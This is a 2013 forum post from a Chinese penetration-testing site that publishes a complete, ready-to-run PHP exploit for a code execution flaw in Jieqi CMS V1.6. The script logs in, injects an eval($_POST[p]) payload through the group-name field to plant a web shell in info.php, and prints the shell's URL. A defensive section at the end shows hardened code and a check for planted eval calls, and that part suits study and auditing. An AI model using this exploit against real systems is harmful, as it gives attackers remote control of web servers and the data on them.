China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Jieqi CMS V1.6 PHP code execution 0day vulnerability exploit

Author: admin    Time: 2013-2-23 11:28
Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration software registration number 2006SR03382) is a modular website-building system that is simple and flexible, high-performance, and secure and reliable. We offer the currently most popular Jieqi serialized-novel system, the Jieqi original comic system and digital publishing solutions, and provide all kinds of website customization services.

This system has multiple remote security vulnerabilities; the one reported today is a remote code execution vulnerability in version 1.6, which should be more than two years old by now.
It requires a user account that is allowed to create a circle (group).

<?php

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host:      target server (ip/hostname)
path:      path to jieqicms
username:  a username who can create group
password:  that user\'s password
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

/* get cookie: log in as the supplied user and save the session cookie to a jar file */
$cookie_jar_index = 'cookie.txt';
$url1 = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1 = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    echo "cURL Error: " . curl_error($curl1);
    exit('exploit failed');
}
curl_close($curl1);
ob_clean();

/* get shell: create a group whose name (gname) breaks out of the quoted string
   the CMS writes into the group's info.php, then appends eval($_POST[p]) */
$params = '-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

';
$params .= "';";
$params .= 'eval($_POST[p]);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
';
$url2 = "http://$host/$path/modules/group/create.php";
$curl2 = curl_init();
$header = array(
    'Content-Type: multipart/form-data; boundary=---------------------------23281168279961'
);
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
ob_start();
curl_exec($curl2);
curl_close($curl2);
$resp = ob_get_contents(); // $resp is the returned page content
ob_clean();

/* the response carries the new group id as g=NNN; the injected code lives in that group's info.php */
preg_match('/g=([0-9]{1,4})/', $resp, $shell);
//print_r($shell);
//print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
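The payload above only makes sense if the group name is written verbatim into files/group/userdir/0/<id>/info.php inside a single-quoted PHP string: the leading `';` closes that string and statement, `eval($_POST[p]);` becomes live code, and `//` comments out whatever the CMS emits after it on that line. The block below is an added example, not Jieqi's code and not part of the original post: it reconstructs that assumed write pattern (the function names, field set and file layout are assumptions made for illustration), puts a hardened writer next to it, and includes a small tokenizer-based check that tells the two resulting files apart. The same check can be pointed at an existing deployment's info.php files to look for a planted eval().

```php
<?php
// Added example (not Jieqi's own code): assumed vulnerable config writer,
// a hardened alternative, and a check for a live eval() in the generated file.

// Constructed input: the gname value the exploit above submits.
$gname = "';eval(\$_POST[p]);//flyh4t";

// Assumed vulnerable writer: concatenates the user-controlled value straight
// into PHP source between single quotes, so a quote in the value ends the string.
function write_info_vulnerable(string $gname, int $gcatid): string {
    return "<?php\n"
         . "\$gname = '" . $gname . "';\n"
         . "\$gcatid = " . $gcatid . ";\n";
}

// Hardened writer: var_export() produces a correctly escaped PHP literal
// (quotes and backslashes included), so the value can never leave its string.
function write_info_hardened(string $gname, int $gcatid): string {
    return "<?php\n"
         . '$gname = ' . var_export($gname, true) . ";\n"
         . '$gcatid = ' . var_export($gcatid, true) . ";\n";
}

// Better still: do not generate PHP from user data at all. Store the record as
// JSON and json_decode() it when the group page is rendered.
function write_info_json(string $gname, int $gcatid): string {
    return json_encode(['gname' => $gname, 'gcatid' => $gcatid], JSON_UNESCAPED_UNICODE) . "\n";
}

// Check: tokenize the generated file and report whether an eval keyword exists
// as code (T_EVAL) rather than as text inside a string or comment.
function contains_live_eval(string $php): bool {
    foreach (token_get_all($php) as $t) {
        if (is_array($t) && $t[0] === T_EVAL) {
            return true;
        }
    }
    return false;
}

$vuln = write_info_vulnerable($gname, 1);
$hard = write_info_hardened($gname, 1);
$json = write_info_json($gname, 1);

echo "vulnerable info.php:\n$vuln\n";
echo "hardened info.php:\n$hard\n";
echo "json record:\n$json\n";
echo "vulnerable file has live eval: " . (contains_live_eval($vuln) ? "yes" : "no") . "\n";
echo "hardened file has live eval:   " . (contains_live_eval($hard) ? "yes" : "no") . "\n";

// Decoding the JSON record gives the original gname back unchanged, as plain data.
$record = json_decode($json, true);
echo "gname from json: " . $record['gname'] . "\n";
```

To audit a live install, run contains_live_eval(file_get_contents($f)) over each info.php under files/group/userdir/; a hit in a file that should contain only assignments is a strong indicator that this technique (or a similar one) was used against it.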




Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2